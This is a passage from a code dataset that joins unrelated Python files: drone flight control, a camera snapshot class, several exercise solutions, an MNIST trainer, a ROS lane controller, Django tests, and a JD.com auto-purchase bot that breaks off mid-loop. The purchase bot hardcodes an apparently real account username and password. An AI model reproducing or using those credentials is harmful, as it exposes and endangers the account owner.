wait_ready=True)\n return vehicle\n''' if not connection_string:\n import dronekit_sitl\n sitl = dronekit_sitl.start_default()\n connection_string = sitl.connection_string()\n vehicle = connect(connection_string, wait_ready=True)\n else:\n vehicle = connect('/dev/ttyUSB0', wait_ready=True, baud=57600)\n'''\n\n#preform preflight checks and fly to 95% of target height\ndef armAndTakeoff(targetHeight):\n #wait for vehicle to become armable\n while vehicle.is_armable!=True:\n print(\"Waiting for vehicle to become armable\")\n time.sleep(1)\n print(\"Vehicle now armable.\")\n\n #wait for vehicle to enter guided flight mode\n vehicle.mode = VehicleMode(\"GUIDED\")\n while vehicle.mode!=\"GUIDED\":\n print(\"Waiting for vehicle to enter GUIDED flight mode\")\n time.sleep(1)\n print(\"Vehicle now in GUIDED MODE.\")\n\n #wait for vehicle to arm\n vehicle.armed = True\n while vehicle.armed == False:\n print(\"Waiting for vehicle to become armed\")\n time.sleep(1)\n print(\"CAUTION: PROPS SPINNING\")\n\n #takeoff to a height within 95% of target\n vehicle.simple_takeoff(targetHeight)\n while True:\n print(\"Current Altitude: %d\"%vehicle.location.global_relative_frame.alt)\n if vehicle.location.global_relative_frame.alt >= .95*targetHeight:\n break\n time.sleep(1)\n print(\"Target altitude of %d has been reached\"%targetHeight)\n return None\n\n#Land immediately\ndef land():\n vehicle.mode = VehicleMode(\"LAND\")\n while vehicle.mode != 'LAND':\n print(\"Waiting for drone to enter LAND mode\")\n time.sleep(1)\n print(\"Landing Drone\")\n while vehicle.location.global_relative_frame.alt > .5:\n print(\"Current Altitude: %d\"%vehicle.location.global_relative_frame.alt)\n time.sleep(2)\n print(\"Vehicle has landed\")\n return None\n\n#Send MavLink velocity command for 1 second with +x being the front of the drone\ndef send_local_velocity(vx, vy, vz):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, 0, 0,\n mavutil.mavlink.MAV_FRAME_BODY_OFFSET_NED,\n 0b0000111111000111, #Bitmask for only velocities\n 0, 0, 0, #position\n vx, vy, vz, #velocity(NED+)\n 0, 0, 0, #Acceleration\n 0, 0)\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n#Send MavLink velocity command for 1 second with +x being the true North of Earth\ndef send_global_velocity(vx,vy, vz):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, #Time to boot in ms\n 0, 0, #Target system, Target component\n mavutil.mavlink.MAV_FRAME_LOCAL_NED, #Frame\n 0b0000111111000111, #bitmask for velocity\n 0, 0, 0,#position\n vx, vy, vz,\n 0, 0, 0,#acceleration\n 0, 0) #Yaw, Yaw rate\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n\n#####Main Excecutable######\nvehicle = connectMyCopter()\nprint(\"Vehicle is connected\")\narmAndTakeoff(10)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(1, 0, 0)\n time.sleep(1)\n print(\"Moving North relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(-1, 0, 0)\n time.sleep(1)\n print(\"Moving South relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(0, 1, 0)\n time.sleep(1)\n print(\"Moving East relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(0, -1, 0)\n time.sleep(1)\n print(\"Moving West relative to drone\")\n count = count + 
1\n\ntime.sleep(2)\n\nland()\n\ntime.sleep(30)\n\nvehicle.close()\n","sub_path":"velocity_based_mov.py","file_name":"velocity_based_mov.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"445683609","text":"import logging\n\nimport os\n\nfrom peek_platform.build_doc.DocBuilder import DocBuilder\nfrom peek_platform.build_frontend.NativescriptBuilder import NativescriptBuilder\nfrom peek_platform.build_frontend.WebBuilder import WebBuilder\n\nlogger = logging.getLogger(__name__)\n\n\nclass ClientFrontendBuildersMixin:\n\n    def _buildMobile(self, loadedPlugins):\n        # --------------------\n        # Prepare the Peek Mobile\n\n        from peek_platform import PeekPlatformConfig\n\n        try:\n            import peek_mobile\n            mobileProjectDir = os.path.dirname(peek_mobile.__file__)\n\n        except ImportError:\n            logger.warning(\"Skipping builds of peek-mobile\"\n                           \", the package can not be imported\")\n            return\n\n        nsBuilder = NativescriptBuilder(mobileProjectDir,\n                                        \"peek-mobile\",\n                                        PeekPlatformConfig.config,\n                                        loadedPlugins)\n        yield nsBuilder.build()\n\n        mobileWebBuilder = WebBuilder(mobileProjectDir,\n                                      \"peek-mobile\",\n                                      PeekPlatformConfig.config,\n                                      loadedPlugins)\n        yield mobileWebBuilder.build()\n\n    def _buildDesktop(self, loadedPlugins):\n        # --------------------\n        # Prepare the Peek Desktop\n        from peek_platform import PeekPlatformConfig\n\n        try:\n            import peek_desktop\n            desktopProjectDir = os.path.dirname(peek_desktop.__file__)\n\n        except ImportError:\n            logger.warning(\"Skipping builds of peek-desktop\"\n                           \", the package can not be imported\")\n            return\n\n        desktopWebBuilder = WebBuilder(desktopProjectDir,\n                                       \"peek-desktop\",\n                                       PeekPlatformConfig.config,\n                                       loadedPlugins)\n        yield desktopWebBuilder.build()\n\n    def _buildDocs(self, loadedPlugins):\n        # --------------------\n        # Prepare the User Docs\n        from peek_platform import PeekPlatformConfig\n\n        try:\n            import peek_doc_user\n            docProjectDir = os.path.dirname(peek_doc_user.__file__)\n\n        except ImportError:\n            logger.warning(\"Skipping builds of peek_doc_user\"\n                           \", the package can not be imported\")\n            return\n\n        docBuilder = DocBuilder(docProjectDir,\n                                \"peek-doc-user\",\n                                PeekPlatformConfig.config,\n                                loadedPlugins)\n        yield docBuilder.build()\n","sub_path":"peek_client/plugin/ClientFrontendBuildersMixin.py","file_name":"ClientFrontendBuildersMixin.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"212584472","text":"import requests\nimport numpy as np\nimport datetime\nimport time\n\nclass MJPEGStreamer():\n    \"\"\"\n    Class for connecting to MJPEG network camera.\n\n    `snap_img()` saves a single snapshot to disk.\n    `stream_img()` displays MJPEG stream using opencv.\n\n    Not async atm.\n    \"\"\"\n\n    def __init__(self, url):\n        self.url = url\n\n    def connect(self, snap=True):\n        path = None  # fallback return value if no complete frame is captured\n        r = requests.get(self.url, stream=True)\n        if r.status_code == 200:\n            bytes = b''\n            for chunk in r.iter_content(chunk_size=1024):\n                bytes += chunk\n                a = bytes.find(b'\\xff\\xd8')\n                b = bytes.find(b'\\xff\\xd9')\n                if a != -1 and b != -1:\n                    jpg = bytes[a:b+2]\n                    bytes = bytes[b+2:]\n                    if snap:\n                        path = self.save_img(jpg)\n                        break\n        else:\n            print(\"Received unexpected status code {}\".format(r.status_code))\n        return path\n\n    def snap_img(self):\n        path = self.connect(snap=True)\n        return path\n\n    def return_image(self):\n        path = self.connect(snap=True)\n        return path\n\n    def save_img(self, jpg):\n        current_time = datetime.datetime.now()\n        
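# Make the timestamp filesystem-safe (currently unused, since the filename below is fixed).\n        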
current_time, _ = str(current_time).replace(\":\",\"-\").split(\".\")\n        current_time = current_time.replace(\" \", \"_\")\n        file_name = \"snapshot.jpeg\"\n        path = \"website/static/snapshots/\"\n\n        with open(path+file_name, mode=\"wb+\") as image:\n            image.write(jpg)\n\n        return file_name","sub_path":"website/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"47038806","text":"import webbrowser\r\n\r\n\r\nclass Movie():\r\n    \"\"\"This class provides a way to store movie related information.\r\n\r\n    Attributes:\r\n        movie_title: a string representing the movie title.\r\n        movie_storyline: a string representing the movies storyline.\r\n        poster_image: a string representing a url to the movies poster image.\r\n        youtube_trailer: a string representing a url to the movies youtube\r\n            trailer.\r\n    \"\"\"\r\n\r\n    def __init__(self, movie_title, movie_storyline, poster_image,\r\n                 trailer_youtube):\r\n        \"\"\"Inits Movie class with title, storyline, poster_image_url, and\r\n        trailer_youtube_url.\"\"\"\r\n        self.title = movie_title\r\n        self.storyline = movie_storyline\r\n        self.poster_image_url = poster_image\r\n        self.trailer_youtube_url = trailer_youtube\r\n\r\n    def show_trailer(self):\r\n        \"\"\"Opens a webbrowser to the URL of the youtube movie trailer for the\r\n        movie that called it.\"\"\"\r\n        webbrowser.open(self.trailer_youtube_url)\r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"252424115","text":"allNum = []\nwhile True:\n    numbers = str(input())\n    split = numbers.split()\n    inInt = list(map(int, split))\n    if inInt[0] == inInt[1]:\n        break\n    allNum.append(inInt)\n\ndef check(i):\n    if sorted(i) == i:\n        print('Crescente')\n    else:\n        print('Decrescente')\n\nfor i in range(len(allNum)):\n    check(allNum[i])\n","sub_path":"1113_Ascending and Descending.py","file_name":"1113_Ascending and Descending.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"585048477","text":"\nclass Solution(object):\n    def connect(self, root):\n        \"\"\"\n        @brief Class for solution.\n\n        ACE\n        80 ms\n\n        outer loop walks down the levels\n        inner loop processes one level from left to right\n        \"\"\"\n        node = root\n        while node and node.left:\n            head = node\n            while node:\n                node.left.next = node.right\n                node.right.next = node.next.left if node.next else None\n                node = node.next\n            node = head.left\n\n\nif __name__ == '__main__':\n    s = Solution()","sub_path":"116_populating_next_right_pointers_in_each_node.py","file_name":"116_populating_next_right_pointers_in_each_node.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"7592897","text":"'''\ncoding=utf-8\nTina 2018-08-20\nAdd bookable time slots for a personal-training coach\n'''\nfrom pageObject.coach_worktime_object import CoachWorkTime\nfrom selenium.webdriver.support.ui import Select\nimport time\n\nclass AddCoachWorkTime:\n\n    def __init__(self):\n        print(\"add AddCoachWorkTime\")\n\n    @staticmethod\n    def add_coach_worktime(driver):\n        addcoachworktime = CoachWorkTime(driver)\n        driver.implicitly_wait(30)\n\n        # Left-hand menu: Courses\n        addcoachworktime.go_course_table_obj().click()\n        # time.sleep(2)\n\n        # Switch to the personal-coach working-time settings tab\n        addcoachworktime.go_private_coach_setting_obj().click()\n
        # time.sleep(2)\n\n        # Select the personal-training coach\n        Select(addcoachworktime.coach_select_obj()).select_by_visible_text(\"测试教练不要删除\")\n\n        # Click the \"add bookable time\" button\n        addcoachworktime.add_worktime_obj().click()\n        # time.sleep(2)\n\n        # Enter the bookable time slot\n        addcoachworktime.time_from_obj().send_keys(\"22:30\")\n        addcoachworktime.time_to_obj().send_keys(\"23:30\")\n\n        # Confirm\n        addcoachworktime.save_button_obj().click()\n        # time.sleep(2)\n\n        # Confirm in the popup dialog\n        addcoachworktime.confirm_button_obj().click()\n        # time.sleep(2)","sub_path":"appModules/add_coach_worktime.py","file_name":"add_coach_worktime.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"11348779","text":"from datamaestro import prepare_dataset\nimport torch\nimport torchvision\nimport torchvision.datasets as dataset\nmnist_trainset = dataset.MNIST(root='./data', train=True, download=False)\nfrom matplotlib import pyplot as plt\nfrom collections import OrderedDict\nimport numpy as np\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nds = prepare_dataset(\"com.lecun.mnist\")\ntrain_images, train_labels = ds.files[\"train/images\"].data(), ds.files[\"train/labels\"].data()\ntest_images, test_labels = ds.files[\"test/images\"].data(), ds.files[\"test/labels\"].data()\n\nclass MonDataset(torch.utils.data.Dataset):\n    def __init__(self,set_data,set_labels):\n        self.datos = torch.tensor(set_data)\n        self.label = torch.tensor(set_labels)\n\n    def __getitem__(self,index):\n        aux = self.datos[index]\n        aux = aux.float() / 255\n        aux = aux.view(aux.shape[0]*aux.shape[1])\n        return(aux,self.label[index].view(1))\n\n    def __len__(self):\n        return(len(self.datos))\n\nmon_dataset = MonDataset(train_images[0:3000],train_labels[0:3000])\nprint(mon_dataset[1][0].shape[0])\n\n##\n\n# from torch.utils.tensorboard import SummaryWriter\n# import numpy as np\n# writer = SummaryWriter(\"runs/TME8AMAL\")\n# for i in range(10):\n#     x = fc_layer1.fc1.weight\n#     writer.add_histogram('distribution centers', x, i)\n# writer.close()\n\n##\n\nfc_layer = torch.nn.Sequential(OrderedDict([\n(\"fc1\",torch.nn.Linear(mon_dataset[1][0].shape[0], 100)),\n(\"relu1\",torch.nn.ReLU()),\n(\"fc2\",torch.nn.Linear(100,100)),\n(\"relu2\",torch.nn.ReLU()),\n(\"fc3\",torch.nn.Linear(100,100)),\n(\"relu3\",torch.nn.ReLU()),\n(\"clas\",torch.nn.Linear(100,10)),\n]))\n\n# class FC_Layer(torch.nn.Module):\n#     def __init__(self):\n#         super().__init__()\n#         self.fc1 = torch.nn.Linear(mon_dataset[1][0].shape[0], 100)\n#         self.fc2 = torch.nn.Linear(100,100)\n#         self.fc3 = torch.nn.Linear(100,100)\n#         self.clas = torch.nn.Linear(100,10)\n#         self.relu = torch.nn.ReLU()\n#         self.dropout = torch.nn.Dropout(0.2)\n#\n#     def forward(self,x):\n#         y = self.fc1(x)\n#         y = self.relu(y)\n#         y = self.dropout(y)\n#         y = self.fc2(y)\n#         y = self.relu(y)\n#         y = self.dropout(y)\n#         y = self.fc3(y)\n#         y = self.relu(y)\n#         y = self.dropout(y)\n#         y = self.clas(y)\n#         return(y)\n#\n# fc_layer = FC_Layer()\n\nd_batch = 300\nnb_epoch = 1000\n\nloss_fn = torch.nn.CrossEntropyLoss()\n\nl_r = 1e-3\noptim = torch.optim.Adam(fc_layer.parameters(),lr=l_r)\n\nhist_list = np.linspace(0,1000,10,dtype=int)\n\nwriter = SummaryWriter(\"runs/TME8AMAL\")\nj = 0\n\n\nfor epoch in range(nb_epoch):\n    data = torch.utils.data.DataLoader(mon_dataset, shuffle = True, batch_size = d_batch)\n    loss_aux = []\n    for x,y in data:\n        y_pred = fc_layer(x)\n        loss = loss_fn(y_pred,y.long().view(d_batch))\n        loss_aux += [loss.item()]\n\n        optim.zero_grad()\n        loss.backward()\n        optim.step()\n\n\n    writer.add_scalar(\"loss l_r %s\" 
%(l_r), np.mean(loss_aux), epoch)\n\n if epoch in hist_list:\n writer.add_histogram('fc1', fc_layer.fc1.weight, j)\n writer.add_histogram('fc2', fc_layer.fc2.weight, j)\n writer.add_histogram('fc3', fc_layer.fc3.weight, j)\n writer.add_histogram('clas', fc_layer.clas.weight, j)\n j += 1\n\n if epoch%50 == 0:\n print(\"Epoch number:\",epoch,\"with error\",np.mean(loss_aux))\n\n\nwriter.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"TME8/TME8.py","file_name":"TME8.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162209163","text":"#!/usr/bin/env python3\n\nimport os\nimport rospy\nfrom duckietown.dtros import DTROS, NodeType, TopicType\nfrom std_msgs.msg import String, Bool\nfrom duckietown_msgs.msg import Twist2DStamped, WheelsCmdStamped, LanePose\nimport numpy as np\nimport time\n\nclass ControllerNode(DTROS):\n\n def __init__(self,node_name):\n # Initialize the DTROS parent class\n super(ControllerNode, self).__init__(node_name=node_name,node_type=NodeType.PERCEPTION)\n\n #Publisher\n #Publishes actuator commands to node handling the wheel commands\n self.pub_car_cmd = rospy.Publisher(\"~cmd\", WheelsCmdStamped, queue_size=1, dt_topic_type=TopicType.CONTROL)\n #self.pub_car_cmd = rospy.Publisher(\"fakebot/car_cmd_switch_node/cmd\", Twist2DStamped, queue_size=1, dt_topic_type=TopicType.CONTROL)\n\n #Subscriber\n #Subscribes to the node publishing the LanePose estimation\n self.sub_lane_reading = rospy.Subscriber(\"~pose\", LanePose, self.control, \"lane_filter\", queue_size=1)\n #self.sub_lane_reading = rospy.Subscriber(\"fakebot/lane_filter_node/lane_pose\", LanePose, self.control, \"lane_filter\", queue_size=1)\n\n #shutdown procedure\n rospy.on_shutdown(self.custom_shutdown)\n\n #sys params\n self.omega_old = 0.0 \n self.dist = 0.0 #class variable to store distance do lanecenter\n self.dold = 0.0 #stores error from previous timestep for derivative term\n self.phi = 0.0 #class variable to store current estimate of heading\n\n #params used for PID control \n self.C_i = 0.0 #class variable, to store integralstate\n\n #loading params from yaml file\n\n #self.baseline = 0.1 #distance between the two wheels\n self.baseline = rospy.get_param('~baseline', None) #distance between the two wheels\n\n #weighting parameters should chosen such that weight_d + weight_phi = 1\n #and weight_d/weight_phi < pi/(2*d_max), where d_max should approx be the lanewidth*safetycoefficient (i.e. 
1.2*lanewidth)\n self.weight_d = rospy.get_param('~weight_d', None)\n self.weight_phi = rospy.get_param('~weight_phi', None)\n\n #parameters for PID controller\n self.k_p = rospy.get_param(\"~k_p\",None)\n self.k_i = rospy.get_param(\"~k_i\",None)\n self.k_d = rospy.get_param(\"~k_d\",None)\n #saturation parameters\n self.sati = rospy.get_param(\"~sati\",None)\n self.satd = rospy.get_param(\"~satd\",None)\n self.omegasat = rospy.get_param(\"~omegasat\",None)\n\n #self.vref = rospy.get_param(\"~vref\",None) #v_ref defines speed at which the robot moves \n self.vref = float(os.environ['SPEED'])\n\n\n #function to reset Integralstate, if robot is thought to be perfectly in Lane (d=phi=0)\n def resetintegral(self,d,phi):\n tol_d = 0.05\n tol_phi = 0.1\n\n if np.abs(d) <= tol_d and np.abs(phi) <= tol_phi:\n self.C_i = 0\n rospy.loginfo(\"Reset Integral\")\n\n #returns true, if robot moves towards lanecenter and False otherwise\n def drivetocenter(self,d,phi):\n if d<0 and phi>0:\n return True\n elif d>0 and phi<0:\n return True\n else:\n return False\n\n #compute velocityboost based on distance to lanecenter\n def computespeed(self,d):\n speedfactor = 2.0\n return speedfactor*np.abs(d)\n\n #compute controlaction based on lanepose estimate\n def getcontrolaction(self,dist,phi,dt):\n \n #compute error for PID\n err = self.weight_d*dist+self.weight_phi*phi\n\n #proportional gain part\n C_p = self.k_p*err\n\n #integral term (approximate integral)\n self.C_i += self.k_i*dt*err\n\n #activate if integralreset is desired:\n #sets integralterm C_i to zero if d and theta are zero, thus the DB is driving perfectly in lane\n #self.resetintegral(dist,tist)\n\n #integral saturation\n #make sure integral term doesnt become too big\n if self.C_i > self.sati:\n self.C_i = self.sati \n if self.C_i < -self.sati:\n self.C_i = -self.sati \n \n #derivative term (usually not used, because noise makes it rather unstable)\n C_d = self.k_d*(err-self.dold)/dt\n self.dold = err\n \n #derivative saturation\n #make sure derivative term doesnt become too big\n if C_d > self.satd:\n C_d = self.satd\n if C_d < -self.satd:\n C_d = -self.satd\n \n #computing control output\n omega = C_p + self.C_i + C_d\n \n #output saturation \n #making sure, that too large of actuator output is requested, \n #since a) the real life motors cannot achieve any arbitrary speed \n #and b) too big of omega could make the robot crash, since there is a delay in the measurements\n if omega>self.omegasat:\n omega=self.omegasat\n if omega<-self.omegasat:\n omega=-self.omegasat\n\n #uncomment the following part to allow change in velocity based on distance to lane center and\n #heading direction (heading towards lane center -> drive faster, heading away -> drive slower)\n #if robot is almost perfectly in lane -> drive faster \n '''\n if np.abs(omega) < 0.05 and np.abs(self.omega_old) < 0.05:\n v = 0.3\n elif self.drivetocenter(dist,tist):\n v = vref + self.computespeed(dist)\n else:\n v = vref - self.computespeed(dist)\n \n self.omega_old = omega\n '''\n\n v = self.vref\n return v,omega\n\n def run(self):\n # publish message every 1/x second\n rate = rospy.Rate(10) \n car_cmd_msg = WheelsCmdStamped()\n #car_cmd_msg = Twist2DStamped()\n tnew = time.time()\n stoptime = 28.0\n t0 = time.time()\n i=0\n\n parammsg1 = [self.k_p,self.k_i,self.k_d]\n rospy.loginfo(\"[kp,ki,kd] = %s\" % parammsg1)\n \n while not rospy.is_shutdown():\n #computing dt for I-part of controller\n told = tnew\n tnew = time.time()\n dt = tnew-told\n \n '''\n #stop programm once a certain 
time has passed (for experiments, not meant for normal usage)\n if tnew-t0>stoptime:\n rospy.logwarn(\"Time's up!!!\")\n rospy.signal_shutdown(\"Ende gut, alles gut\")\n self.custom_shutdown()\n '''\n \n v,omega = self.getcontrolaction(self.dist,self.phi,dt)\n\n #car_cmd_msg.omega = self.omega\n #car_cmd_msg.v = self.vref\n\n #console output, if requested actuatoroutput saturates\n if np.abs(omega) >= self.omegasat:\n rospy.logwarn(\"Max Omega reached\")\n\n #def. motor commands that will be published\n car_cmd_msg.header.stamp = rospy.get_rostime()\n car_cmd_msg.vel_left = v - 0.5*self.baseline * omega\n car_cmd_msg.vel_right = v + 0.5*self.baseline * omega\n #publish actuator output to wheels_driver_node\n self.pub_car_cmd.publish(car_cmd_msg)\n\n #printing messages to verify that program is working correctly \n #i.ei if dist and tist are always zero, then there is probably no data from the lan_pose\n message1 = self.dist\n message2 = omega\n message3 = self.phi\n message4 = v\n\n #rospy.loginfo('d: %s' % message1)\n #rospy.loginfo('omega: %s' % message2)\n #rospy.loginfo('phi: %s' % message3)\n rospy.loginfo('v: %s' % message4)\n #rospy.loginfo(\"time: %s\" % message5)\n \n rate.sleep()\n\n #shutdown procedure, stopping motor movement etc.\n def custom_shutdown(self):\n stop_msg = WheelsCmdStamped()\n stop_msg.header.stamp = rospy.get_rostime()\n stop_msg.vel_left = 0.0\n stop_msg.vel_right = 0.0\n\n self.pub_car_cmd.publish(stop_msg)\n rospy.sleep(0.5)\n rospy.loginfo(\"Shutdown complete oder?????\")\n\n #function updates pose variables, that camera gives us data at higher rate then this code operates at,\n #thus we do not use all incoming data\n def control(self,pose, source):\n self.dist = pose.d \n self.phi = pose.phi \n\n delay = rospy.Time.now() - pose.header.stamp\n delay_float = delay.secs + float(delay.nsecs)/1e9 \n rospy.loginfo('delay [s] = %s' % delay_float) \n\nif __name__ == \"__main__\":\n # Initialize the node\n #rospy.loginfo(\"Hello from the start\")\n\n lane_controller_node = ControllerNode(node_name='lane_controller_node')\n\n lane_controller_node.run()\n # Keep it spinning\n rospy.spin()","sub_path":"packages/my_package/src/weightedPID.py","file_name":"weightedPID.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"567311363","text":"from django.test import TestCase\nfrom clientes.models import Empresa, Informativo\nfrom django.contrib.auth.models import User\n\ndef mockup_empresa():\n usuario = User.objects.create_user(username=\"mock\",email=\"test@mock.com.br\",password=\"123123\") \n empresa_mock = Empresa(nome_empresa=\"Empresa Teste\",cnpj=\"34.534.534/5345-34\",\n insc_estadual=\"34.534.534-5\",rua=\"Rua dos Mocks\",\n complemento=\"n 350 10 andar sala 1000\",cep=\"24.654-780\",\n cidade=\"Pinhais\",uf=\"RS\",usuario=usuario)\n empresa_mock.save()\n return empresa_mock\n\ndef mockup_informativo(empresa):\n informativo = Informativo(assunto='Promoção do Mes',mensagem='Contratando nossos serviços de RH até o dia 30, você recebe um desconto de 30% até a proxima renovação. 
Aproveite!',\n                              eh_pendencia=False,visualizado=False)\n    informativo.save()\n    informativo.empresas.add(empresa)\n    informativo.save()\n    return informativo\n\n\nclass EmpresaTestCase(TestCase):\n\n    def test_verificar_se_empresa_esta_salvando_corretamente(self):\n        empresa = mockup_empresa()\n        self.assertIsNot(empresa.id,None)\n\n    def test_obter_endereco_completo(self):\n        empresa = mockup_empresa()\n        endereco_esperado = \"Rua dos Mocks n 350 10 andar sala 1000 / Pinhais-RS Cep: 24.654-780\"\n        self.assertEqual(endereco_esperado,empresa.endereco_completo)\n\n    def test_obter_informacao_quando_nao_ha_telefone_cadastrado(self):\n        empresa = mockup_empresa()\n        mensagem_esperada = \"Nenhum telefone informado.\"\n\n        self.assertEqual(mensagem_esperada,empresa.telefones_contato)\n\n    def test_excluir_informativos_quando_excluir_a_ultima_empresa_relacionada(self):\n        empresa = mockup_empresa()\n        informativo = mockup_informativo(empresa)\n        self.assertQuerysetEqual([],Informativo.obter_todos(empresas_is_null=True))\n\n        empresa.deletar_empresa()\n        Informativo.deletar_informativos_sem_empresas()\n        self.assertQuerysetEqual([],Informativo.objects.all())\n\nclass InformativoTestCase(TestCase):\n\n    def test_verificar_se_informativo_esta_salvando_corretamente(self):\n        empresa = mockup_empresa()\n        informe = mockup_informativo(empresa)\n        self.assertIsNot(informe.id, None)\n\n\n","sub_path":"clientes/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"206340829","text":"\"\"\"\nThis encapsulation exercise uses a Level and Experience system:\nwhen hero1 attacks, its experience increases and its level goes up, and vice versa\n\"\"\"\n\n\nclass Hero:\n    # private class variable\n    __jumlah = 0\n\n    def __init__(self, name, health, attPower, armor):\n        self.__name = name\n        self.__healthStandar = health\n        self.__attPowerStandar = attPower\n        self.__armorStandar = armor\n        self.__level = 1\n        self.__exp = 0\n\n        self.__healthMax = self.__healthStandar * self.__level\n        self.__attPower = self.__attPowerStandar * self.__level\n        self.__armor = self.__armorStandar * self.__level\n\n        self.__health = self.__healthMax\n\n        Hero.__jumlah += 1\n\n    @property\n    def info(self):\n        return \"{} level {} : \\n\\thealth = {}/{} \\n\\tattack = {} \\n\\tarmor = {}\".format(self.__name, self.__level,\n                                                                                       self.__health,\n                                                                                       self.__healthMax,\n                                                                                       self.__attPower,\n                                                                                       self.__armor)\n\n    @property\n    def gainExp(self):\n        return self.__exp\n\n    @gainExp.setter\n    def gainExp(self, addExp):\n        self.__exp += addExp\n        while self.__exp >= 100:\n            print(self.__name, 'level up')\n            self.__level += 1\n            self.__exp -= 100\n\n            self.__healthMax = self.__healthStandar * self.__level\n            self.__attPower = self.__attPowerStandar * self.__level\n            self.__armor = self.__armorStandar * self.__level\n\n    def attack(self, musuh):\n        self.gainExp = 299\n\n\nslandar = Hero('slandar', 100, 5, 10)\naxe = Hero('axe', 100, 5, 10)\nprint(slandar.info)\n\nslandar.attack(axe)\nslandar.attack(axe)\nslandar.attack(axe)\nslandar.attack(axe)\nprint(slandar.info)\n","sub_path":"latihan_encapsulation.py","file_name":"latihan_encapsulation.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"286899215","text":"class Solution:\n    \"\"\"\n    @param n: count lucky numbers from 1 ~ n\n    @return: the numbers of lucky number\n    \"\"\"\n    def luckyNumber(self, n):\n        # Write your code here\n        if n < 
8:\n            return 0\n        d = len(str(n)) - 1\n        a = [0, 1]\n        for i in xrange(2, d + 1):\n            a.append(a[-1] * 9 + 10**(i - 1))\n\n        p = 10**d\n        m = n / p\n        if m == 8:\n            return m * a[d] + (n % p) + 1\n        elif m > 8:\n            return (m - 1) * a[d] + p + self.luckyNumber(n % p)\n        else:\n            return m * a[d] + self.luckyNumber(n % p)\n","sub_path":"Contest 30 Quarter #1/1385. Lucky Number Eight/alex.py","file_name":"alex.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"233219866","text":"from splinter import Browser\r\nfrom selenium import webdriver\r\nfrom datetime import datetime, timedelta\r\nimport time\r\nimport argparse\r\n\r\n\r\n\r\n\r\nPRICE = \"\"\r\nb=Browser('chrome')\r\n\r\n#b=webdriver.Chrome()\r\ndef endStep():\r\n    nprice = PRICE\r\n    while nprice == PRICE:\r\n        b.reload()\r\n        nprice = b.find_by_id('needPayPrice').value\r\n        print (\"%s-->current price:%s\" % (datetime.now().strftime(\"%H:%M:%S.%f\"), nprice))\r\n    print (\"submit order.....\")\r\n    b.find_by_id('submit').click()\r\n\r\nif __name__ == '__main__':\r\n    parser = argparse.ArgumentParser(description='Simulate to login Jing Dong, and buy specified good')\r\n    parser.add_argument('-d', '--bday',\r\n                        help='buy day', default='')\r\n    parser.add_argument('-t', '--btime',\r\n                        help='buy time', default='0')\r\n#\r\n#\r\n    options = parser.parse_args()\r\n    print(options)\r\n    buyd=options.bday\r\n    buyt=options.btime\r\n\r\n#    buyh=int(options.bhour)\r\n#    buym=int(options.bminute)\r\n#    buyh=24\r\n#    buym=15\r\n#    if buym==0:\r\n#        bbm=59\r\n#        bbh=buyh-1\r\n#    else:\r\n#        bbm=buym-1\r\n#        bbh=buyh\r\n#\r\n    # for test\r\n    print (\"start.....\")\r\n#\r\n    t3=datetime.strptime(buyd+' '+buyt,'%Y-%m-%d %H:%M:%S')\r\n    #t3=datetime.strptime('2017-03-02 00:00:00','%Y-%m-%d %H:%M:%S')\r\n    #b.visit('https://passport.jd.com/new/login.aspx?ReturnUrl=https://cart.jd.com/order/orderInfoMain.html')\r\n    #b.visit('https://passport.jd.com/new/login.aspx?ReturnUrl=https://item.jd.com/4325034.html')\r\n    b.visit('https://passport.jd.com/new/login.aspx?ReturnUrl=https://item.jd.com/4390094.html')\r\n    uu=b.find_link_by_text('账户登录')\r\n    uu.click()\r\n    b.fill('loginname','18371542519')\r\n#    b.fill('loginname','18371542519')\r\n    b.fill('nloginpwd','Super123!')\r\n    b.find_by_id('loginsubmit').click()\r\n    #b.visit('https://item.jd.com/3763103.html')\r\n    tt=datetime.now()\r\n    tttt= t3-tt\r\n    ttt= tttt.days*24*60*60+tttt.seconds\r\n    while (ttt>-60*15):\r\n\r\n        